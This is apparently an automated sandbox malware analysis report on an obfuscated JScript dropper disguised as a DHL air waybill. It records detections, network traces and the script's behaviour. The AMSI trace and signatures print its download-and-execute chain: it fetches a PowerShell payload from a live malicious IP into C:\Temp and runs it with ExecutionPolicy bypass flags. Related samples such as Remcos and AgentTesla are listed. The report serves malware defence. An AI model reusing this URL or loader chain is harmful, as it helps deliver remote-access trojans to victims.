Edit tour

Windows Analysis Report
DHL AWB.js

Overview

General Information

Sample name:DHL AWB.js
Analysis ID:1646997
MD5:6e4db484b0e33d5b78a806ffe1e1a86e
SHA1:f54e823f9055e43eaf07a6c0a3a0ba8bed217c8b
SHA256:b2765e4aff6a0ab889043a7f49066d9032c68cf8814a392848433add74b1895a
Tags:DHLjsRATRemcosRATuser-abuse_ch
Infos:

Detection

Score:92
Range:0 - 100
Confidence:100%

Signatures

Antivirus detection for URL or domain
JScript performs obfuscated calls to suspicious functions
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
JavaScript source code contains functionality to generate code involving HTTP requests or file downloads
JavaScript source code contains functionality to generate code involving a shell, file or stream
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: WScript or CScript Dropper
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Found WSH timer for Javascript or VBS script (likely evasive script)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
Program does not show much activity (idle)
Sigma detected: Script Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
  • System is w10x64
  • wscript.exe (PID: 7632 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHL AWB.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: Network ConnectionAuthor: frack113, Florian Roth: Data: DestinationIp: 176.65.144.3, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 7632, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49714
Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHL AWB.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHL AWB.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3964, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHL AWB.js", ProcessId: 7632, ProcessName: wscript.exe
Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 176.65.144.3, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 7632, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49714
Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHL AWB.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHL AWB.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3964, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHL AWB.js", ProcessId: 7632, ProcessName: wscript.exe
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: http://176.65.144.3/host/POPO.ps1Avira URL Cloud: Label: malware
Source: DHL AWB.jsReversingLabs: Detection: 13%
Source: DHL AWB.jsVirustotal: Detection: 16%Perma Link

Software Vulnerabilities

barindex
Source: DHL AWB.jsReturn value : ['message,523362EaabQf,680259YMcTyC,Exiting script due to download failure.,Scripting.FileSystemObject']Go to definition
Source: DHL AWB.jsReturn value : ['message,523362EaabQf,680259YMcTyC,Exiting script due to download failure.,Scripting.FileSystemObject']Go to definition
Source: DHL AWB.jsReturn value : ['"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "', 'message,523362EaabQf,680259YMcTyC,Exiting script due to download failure.,Scripting.FileSystemObject']Go to definition
Source: DHL AWB.jsReturn value : ['"WScript.Shell"', '"Scripting.FileSystemObject"', '"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "', 'message,523362EaabQf,680259YMcTyC,Exiting script due to download failure.,Scripting.FileSystemObject']Go to definition
Source: DHL AWB.jsReturn value : ['"WScript.Shell"', '"Scripting.FileSystemObject"', '"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "', 'message,523362EaabQf,680259YMcTyC,Exiting script due to download failure.,Scripting.FileSystemObject']Go to definition
Source: DHL AWB.jsReturn value : ['"WScript.Shell"', '"Scripting.FileSystemObject"', '"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "', 'message,523362EaabQf,680259YMcTyC,Exiting script due to download failure.,Scripting.FileSystemObject']Go to definition
Source: DHL AWB.jsReturn value : ['"WScript.Shell"', '"Scripting.FileSystemObject"', '"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "', 'message,523362EaabQf,680259YMcTyC,Exiting script due to download failure.,Scripting.FileSystemObject']Go to definition
Source: DHL AWB.jsReturn value : ['"WScript.Shell"', '"Scripting.FileSystemObject"', '"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "', 'message,523362EaabQf,680259YMcTyC,Exiting script due to download failure.,Scripting.FileSystemObject']Go to definition
Source: DHL AWB.jsReturn value : ['"WScript.Shell"', '"Scripting.FileSystemObject"', '"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "', 'message,523362EaabQf,680259YMcTyC,Exiting script due to download failure.,Scripting.FileSystemObject']Go to definition

Networking

barindex
Source: C:\Windows\System32\wscript.exeNetwork Connect: 176.65.144.3 80Jump to behavior
Source: DHL AWB.jsReturn value : ['message,523362EaabQf,680259YMcTyC,Exiting script due to download failure.,Scripting.FileSystemObject']Go to definition
Source: DHL AWB.jsArgument value : ['"http://176.65.144.3/host/POPO.ps1","C:\\Temp\\GHASHGASGH.ps1"']Go to definition
Source: DHL AWB.jsReturn value : ['message,523362EaabQf,680259YMcTyC,Exiting script due to download failure.,Scripting.FileSystemObject']Go to definition
Source: DHL AWB.jsArgument value : ['"GET","http://176.65.144.3/host/POPO.ps1",false', '"Send"']Go to definition
Source: DHL AWB.jsReturn value : ['"MSXML2.XMLHTTP"', '"Send"']Go to definition
Source: DHL AWB.jsReturn value : ['message,523362EaabQf,680259YMcTyC,Exiting script due to download failure.,Scripting.FileSystemObject']Go to definition
Source: DHL AWB.jsReturn value : ['message,523362EaabQf,680259YMcTyC,Exiting script due to download failure.,Scripting.FileSystemObject']Go to definition
Source: DHL AWB.jsReturn value : ['message,523362EaabQf,680259YMcTyC,Exiting script due to download failure.,Scripting.FileSystemObject']Go to definition
Source: DHL AWB.jsArgument value : ['"http://176.65.144.3/host/POPO.ps1","C:\\Temp\\GHASHGASGH.ps1"']Go to definition
Source: DHL AWB.jsReturn value : ['"MSXML2.XMLHTTP"']Go to definition
Source: Joe Sandbox ViewIP Address: 176.65.144.3 176.65.144.3
Source: Joe Sandbox ViewASN Name: PALTEL-ASPALTELAutonomousSystemPS PALTEL-ASPALTELAutonomousSystemPS
Source: global trafficTCP traffic: 192.168.2.4:49714 -> 176.65.144.3:80
Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
Source: wscript.exe, 00000001.00000003.1498643178.00000150470A0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1499564815.00000150470A0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1500380233.00000150470A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.65.144.3/
Source: wscript.exe, 00000001.00000003.1431509157.000001504968F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.65.144.3/O
Source: wscript.exe, 00000001.00000003.1431509157.000001504968F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.65.144.3/S
Source: wscript.exe, 00000001.00000003.1214300595.0000015048D9A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1501163645.0000015049680000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1496915341.00000150470FC000.00000004.00000020.00020000.00000000.sdmp, DHL AWB.jsString found in binary or memory: http://176.65.144.3/host/POPO.ps1
Source: wscript.exe, 00000001.00000003.1431509157.000001504968F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.65.144.3/host/POPO.ps1&
Source: wscript.exe, 00000001.00000003.1431509157.000001504968F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1501163645.0000015049680000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com

System Summary

barindex
Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
Source: C:\Windows\System32\wscript.exeCOM Object queried: XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}Jump to behavior
Source: DHL AWB.jsInitial sample: Strings found which are bigger than 50
Source: classification engineClassification label: mal92.evad.winJS@1/0@0/1
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: DHL AWB.jsReversingLabs: Detection: 13%
Source: DHL AWB.jsVirustotal: Detection: 16%
Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msxml3.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32Jump to behavior
Source: C:\Windows\System32\wscript.exeAutomated click: OK
Source: C:\Windows\System32\wscript.exeAutomated click: OK

Data Obfuscation

barindex
Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript.Shell%22");IHost.Name();ITextStream.WriteLine(" entry:285 o:Windows%20Script%20Host f:CreateObject a0:%22WScript.Shell%22");IHost.CreateObject("WScript.Shell");IHost.Name();IWshShell3._00000000();ITextStream.WriteLine(" exit:285 o:Windows%20Script%20Host f:CreateObject r:");ITextStream.WriteLine(" entry:303 f:i a0:504");ITextStream.WriteLine(" exit:303 f:i r:%22CreateObject%22");ITextStream.WriteLine(" entry:308 f:i a0:503");ITextStream.WriteLine(" exit:308 f:i r:%22Scripting.FileSystemObject%22");IHost.Name();ITextStream.WriteLine(" entry:299 o:Windows%20Script%20Host f:CreateObject a0:%22Scripting.FileSystemObject%22");IHost.CreateObject("Scripting.FileSystemObject");IHost.Name();IFileSystem3._00000000();ITextStream.WriteLine(" exit:299 o:Windows%20Script%20Host f:CreateObject r:");ITextStream.WriteLine(" entry:317 f:i a0:504");ITextStream.WriteLine(" exit:317 f:i r:%22CreateObject%22");ITextStream.WriteLine(" entry:322 f:i a0:481");ITextStream.WriteLine(" exit:322 f:i r:%22MSXML2.XMLHTTP%22");IHost.Name();ITextStream.WriteLine(" entry:313 o:Windows%20Script%20Host f:CreateObject a0:%22MSXML2.XMLHTTP%22");IHost.CreateObject("MSXML2.XMLHTTP");IHost.Name();IServerXMLHTTPRequest2._00000000();ITextStream.WriteLine(" exit:313 o:Windows%20Script%20Host f:CreateObject r:");ITextStream.WriteLine(" entry:334 f:i a0:486");ITextStream.WriteLine(" exit:334 f:i r:%22FolderExists%22");IFileSystem3._00000000();ITextStream.WriteLine(" entry:330 o: f:FolderExists a0:%22C%3A%5CTemp%22");IFileSystem3.FolderExists("C:\Temp");IFileSystem3._00000000();ITextStream.WriteLine(" exit:330 o: f:FolderExists r:false");ITextStream.WriteLine(" entry:344 f:i a0:496");ITextStream.WriteLine(" exit:344 f:i r:%22CreateFolder%22");IFileSystem3._00000000();ITextStream.WriteLine(" entry:340 o: f:CreateFolder a0:%22C%3A%5CTemp%22");IFileSystem3.CreateFolder("C:\Temp");IFileSystem3._00000000();IFolder.Path();ITextStream.WriteLine(" exit:340 o: f:CreateFolder r:C%3A%5CTemp");ITextStream.WriteLine(" entry:540 f:DownloadScript a0:%22http%3A%2F%2F176.65.144.3%2Fhost%2FPOPO.ps1%22 a1:%22C%3A%5CTemp%5CGHASHGASGH.ps1%22");ITextStream.WriteLine(" exec:350 f:DownloadScript");ITextStream.WriteLine(" entry:364 f:j a0:492");ITextStream.WriteLine(" exit:364 f:j r:%22Open%22");IServerXMLHTTPRequest2._00000000();ITextStream.WriteLine(" entry:360 o: f:Open a0:%22GET%22 a1:%22http%3A%2F%2F176.65.144.3%2Fhost%2FPOPO.ps1%22 a2:false");IServerXMLHTTPRequest2.open("GET", "http://176.65.144.3/host/POPO.ps1", "false");IServerXMLHTTPRequest2._00000000();ITextStream.WriteLine(" exit:360 o: f:Open r:undefined");ITextStream.WriteLine(" entry:377 f:j a0:495");ITextStream.WriteLine(" exit:377 f:j r:%22Send%22");IServerXMLHTTPRequest2._00000000();ITextStream.WriteLine(" entry:373 o: f:Send");IServerXMLHTTPRequest2.send()
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: wscript.exe, 00000001.00000003.1496832576.0000015047110000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1431509157.00000150496A2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1500630431.0000015047116000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1501163645.00000150496A2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: wscript.exe, 00000001.00000003.1496832576.0000015047110000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1500630431.0000015047116000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW,
Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Windows\System32\wscript.exeNetwork Connect: 176.65.144.3 80Jump to behavior
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information32
Scripting
Valid AccountsWindows Management Instrumentation32
Scripting
1
Process Injection
1
Process Injection
OS Credential Dumping1
Security Software Discovery
Remote ServicesData from Local SystemData ObfuscationExfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
DLL Side-Loading
1
DLL Side-Loading
1
DLL Side-Loading
LSASS Memory2
System Information Discovery
Remote Desktop ProtocolData from Removable MediaJunk DataExfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Obfuscated Files or Information
Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1646997 Sample: DHL AWB.js Startdate: 24/03/2025 Architecture: WINDOWS Score: 92 11 Antivirus detection for URL or domain 2->11 13 Multi AV Scanner detection for submitted file 2->13 15 JavaScript source code contains functionality to generate code involving HTTP requests or file downloads 2->15 17 3 other signatures 2->17 5 wscript.exe 1 13 2->5         started        process3 dnsIp4 9 176.65.144.3, 80 PALTEL-ASPALTELAutonomousSystemPS Germany 5->9 19 System process connects to network (likely due to code injection or exploit) 5->19 21 JScript performs obfuscated calls to suspicious functions 5->21 23 Windows Scripting host queries suspicious COM object (likely to drop second stage) 5->23 signatures5

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
DHL AWB.js14%ReversingLabs
DHL AWB.js16%VirustotalBrowse
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://176.65.144.3/host/POPO.ps1&0%Avira URL Cloudsafe
http://176.65.144.3/O0%Avira URL Cloudsafe
http://176.65.144.3/host/POPO.ps1100%Avira URL Cloudmalware
http://176.65.144.3/S0%Avira URL Cloudsafe
http://176.65.144.3/0%Avira URL Cloudsafe

Download Network PCAP: filteredfull

No contacted domains info
NameSourceMaliciousAntivirus DetectionReputation
http://176.65.144.3/wscript.exe, 00000001.00000003.1498643178.00000150470A0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1499564815.00000150470A0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1500380233.00000150470A0000.00000004.00000020.00020000.00000000.sdmptrue
  • Avira URL Cloud: safe
unknown
http://176.65.144.3/Owscript.exe, 00000001.00000003.1431509157.000001504968F000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://176.65.144.3/host/POPO.ps1&wscript.exe, 00000001.00000003.1431509157.000001504968F000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://176.65.144.3/host/POPO.ps1wscript.exe, 00000001.00000003.1214300595.0000015048D9A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1501163645.0000015049680000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1496915341.00000150470FC000.00000004.00000020.00020000.00000000.sdmp, DHL AWB.jstrue
  • Avira URL Cloud: malware
unknown
http://176.65.144.3/Swscript.exe, 00000001.00000003.1431509157.000001504968F000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs
IPDomainCountryFlagASNASN NameMalicious
176.65.144.3
unknownGermany
12975PALTEL-ASPALTELAutonomousSystemPStrue
Joe Sandbox version:42.0.0 Malachite
Analysis ID:1646997
Start date and time:2025-03-24 13:41:11 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 33s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:default.jbs
Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:12
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • GSI enabled (Javascript)
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Sample name:DHL AWB.js
Detection:MAL
Classification:mal92.evad.winJS@1/0@0/1
EGA Information:Failed
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 0
  • Number of non-executed functions: 0
Cookbook Comments:
  • Found application associated with file extension: .js
  • Exclude process from analysis (whitelisted): MpCmdRun.exe, sppsvc.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
  • Excluded IPs from analysis (whitelisted): 23.204.23.20, 4.245.163.56
  • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, c.pki.goog, fe3cr.delivery.mp.microsoft.com
  • Not all processes where analyzed, report is missing behavior information
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtProtectVirtualMemory calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
No simulations
MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
176.65.144.3#U4ed8#U6b3e#U6c47#U6b3e#U901a#U77e5.jsGet hashmaliciousRemcosBrowse
  • 176.65.144.3/host/kent.exe
xenn.ps1Get hashmaliciousRedLineBrowse
  • 176.65.144.3/dev/xenbuild.exe
Confirmaci#U00f3n de Pago.jsGet hashmaliciousRemcosBrowse
  • 176.65.144.3/FILE/KENNNTTT.ps1
STEPH.jsGet hashmaliciousFormBookBrowse
  • 176.65.144.3/FILE/STEPH.ps1
Rendel#U00e9si k#U00e9relem.exeGet hashmaliciousDarkCloudBrowse
  • 176.65.144.3/dev/fireballs.exe
MUKK.ps1Get hashmaliciousAgentTeslaBrowse
  • 176.65.144.3/dev/muhk.exe
obfuscated (1).jsGet hashmaliciousXWormBrowse
  • 176.65.144.3/dev/BRAINN.exe
KIM.ps1Get hashmaliciousStealeriumBrowse
  • 176.65.144.3/dev/Cooperbuild34.exe
KENT.ps1Get hashmaliciousRemcosBrowse
  • 176.65.144.3/dev/kent.exe
VIK.ps1.vir.txt.ps1Get hashmaliciousAgentTeslaBrowse
  • 176.65.144.3/dev/DONORIGIN.exe
No context
MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
PALTEL-ASPALTELAutonomousSystemPS#U4ed8#U6b3e#U6c47#U6b3e#U901a#U77e5.jsGet hashmaliciousRemcosBrowse
  • 176.65.144.3
owari.spc.elfGet hashmaliciousUnknownBrowse
  • 213.6.206.42
SecuriteInfo.com.Win32.Trojan.Agent.QWCKHW.31433.26307.exeGet hashmaliciousUnknownBrowse
  • 176.65.138.157
xenn.ps1Get hashmaliciousRedLineBrowse
  • 176.65.144.135
Confirmaci#U00f3n de Pago.jsGet hashmaliciousRemcosBrowse
  • 176.65.144.3
STEPH.jsGet hashmaliciousFormBookBrowse
  • 176.65.144.3
nabppc.elfGet hashmaliciousUnknownBrowse
  • 82.213.50.193
Rendel#U00e9si k#U00e9relem.exeGet hashmaliciousDarkCloudBrowse
  • 176.65.144.3
MUKK.ps1Get hashmaliciousAgentTeslaBrowse
  • 176.65.144.3
obfuscated (1).jsGet hashmaliciousXWormBrowse
  • 176.65.144.3
No context
No context
No created / dropped files found
File type:ASCII text, with very long lines (2087), with no line terminators
Entropy (8bit):5.7039875139870455
TrID:
    File name:DHL AWB.js
    File size:2'087 bytes
    MD5:6e4db484b0e33d5b78a806ffe1e1a86e
    SHA1:f54e823f9055e43eaf07a6c0a3a0ba8bed217c8b
    SHA256:b2765e4aff6a0ab889043a7f49066d9032c68cf8814a392848433add74b1895a
    SHA512:af74cd508f3ddd6e3defa139e54798f53ba370c99c47c7e1383edeaac4652cfcf0eaa106b05f0ffdd8e3196d904ec5c98b034f71c1e72130ddcb30a834143f60
    SSDEEP:48:qyxHNhwb0Z0JovXQwKphyn4T+t6U08kSnmmGCTgWJDLfcpJw:9tSb0W7wyknxr/GegEYw
    TLSH:114161EE3F24E08C8757476B9E2F441DEA71D84429E1C512D2A2A9C9FC14370EE3B726
    File Content Preview:function a(){var m=['message','523362EaabQf','680259YMcTyC','Exiting\x20script\x20due\x20to\x20download\x20failure.','Scripting.FileSystemObject','CreateObject','Run','Echo','19478fjLYJG','Status','10Zjgbgr','985635JFbYNr','MSXML2.XMLHTTP','PowerShell\x20
    Icon Hash:68d69b8bb6aa9a86

    Download Network PCAP: filteredfull

    TimestampSource PortDest PortSource IPDest IP
    Mar 24, 2025 13:42:13.574007034 CET4971480192.168.2.4176.65.144.3
    Mar 24, 2025 13:42:14.582998991 CET4971480192.168.2.4176.65.144.3
    Mar 24, 2025 13:42:16.594636917 CET4971480192.168.2.4176.65.144.3
    Mar 24, 2025 13:42:20.610387087 CET4971480192.168.2.4176.65.144.3
    Mar 24, 2025 13:42:28.610419989 CET4971480192.168.2.4176.65.144.3
    050100s020406080100

    Click to jump to process

    050100s0.005101520MB

    Click to jump to process

    • File
    • Registry

    Click to dive into process behavior distribution

    Target ID:1
    Start time:08:42:11
    Start date:24/03/2025
    Path:C:\Windows\System32\wscript.exe
    Wow64 process (32bit):false
    Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHL AWB.js"
    Imagebase:0x7ff7e58e0000
    File size:170'496 bytes
    MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
    Has elevated privileges:false
    Has administrator privileges:false
    Programmed in:C, C++ or other language
    Reputation:high
    Has exited:true
    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

    Call Graph

    Hide Legend
    • Executed
    • Not Executed
    callgraph clusterC0 clusterC2C0 clusterC4C2 clusterC6C0 clusterC8C6 clusterC10C6 clusterC12C6 clusterC14C6 clusterC16C6 clusterC18C6 clusterC20C6 clusterC22C0 clusterC24C22 clusterC26C0 clusterC28C0 clusterC30C28 clusterC32C28 clusterC34C28 clusterC36C0 clusterC38C36 clusterC40C0 clusterC42C40 E1C0 entry:C0 F7C6 E1C0->F7C6 F27C26 i E1C0->F27C26 F29C28 DownloadScript E1C0->F29C28 F37C36 LogError E1C0->F37C36 F41C40 RunPowerShellScript E1C0->F41C40 F3C2 a F3C2->F3C2 F5C4 F9C8 c F7C6->F9C8 F11C10 parseInt F7C6->F11C10 F13C12 h F7C6->F13C12 F15C14 'push' F7C6->F15C14 F17C16 'shift' F7C6->F17C16 F19C18 'push' F7C6->F19C18 F21C20 'shift' F7C6->F21C20 F23C22 b F23C22->F3C2 F23C22->F23C22 F25C24 F31C30 j F29C28->F31C30 F33C32 'Write' F29C28->F33C32 F35C34 'Close' F29C28->F35C34 F29C28->F37C36 F39C38 k F37C36->F39C38 F41C40->F37C36 F43C42 l F41C40->F43C42

    Script:

    Code
    0
    function a() {
